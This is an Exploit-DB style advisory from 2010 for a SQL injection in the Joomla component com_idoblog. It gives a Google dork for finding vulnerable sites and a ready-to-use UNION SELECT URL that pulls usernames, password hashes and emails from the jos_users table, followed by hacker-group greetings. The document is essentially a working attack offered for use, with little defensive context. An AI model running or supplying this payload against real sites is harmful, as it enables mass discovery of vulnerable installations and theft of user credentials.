Joomla! Component com_idoblog - SQL Injection

EDB-ID:

15827

CVE:

N/A




Platform:

PHP

Date:

2010-12-25


# Exploit Title: joomla com_idoblog /SQL injection Vulnerability
# Google Dork: inurl:"com_idoblog"
# Date: 25/12/2010
# Author: NOCKAR1111
# Location:Algeria
# AuthorEmail:nockar1111@hotmail.com
# Language: php
# Tested on: windows xp sp3 en
# http://extensions.joomla.org/extensions/news-production/blog/9218

#Exploit:http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--

____________________________________________
Greetz:Lagripe-dz,BrOx-Dz,Mr NoRvI,indoushka
and dz4all members